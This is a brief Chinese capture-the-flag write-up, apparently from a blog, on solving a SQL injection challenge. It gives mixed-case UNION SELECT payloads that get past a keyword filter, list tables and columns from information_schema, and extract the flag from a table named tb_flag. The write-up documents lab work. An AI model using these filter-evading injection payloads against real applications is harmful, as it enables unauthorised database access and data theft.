1. 输入and 1=1发现非法提示
通过大小写混淆可以绕过
2. 经测试,发现有5个字段
3. 查数据库和当前用户
4. 查表
UniOn SelEct 1,(SelEct Table_Name fROm InfOrMation_sChema.tAbles WhEre tAble_sChema=‘news‘ lImit 1,1),3,4,5#
5. 查表中字段
UniOn Select 1,(SelecT ColuMn_Name FrOm InFOrMation_sChema.COluMns WherE TaBle_NaMe=‘tb_flag‘ liMit 0,1),3,4,5#
5. 查内容
UniOn Select 1,(SelecT flag FrOm news.tb_flag),3,4,5#
本文固定链接:http://www.cnblogs.com/hell0w/p/8119659.html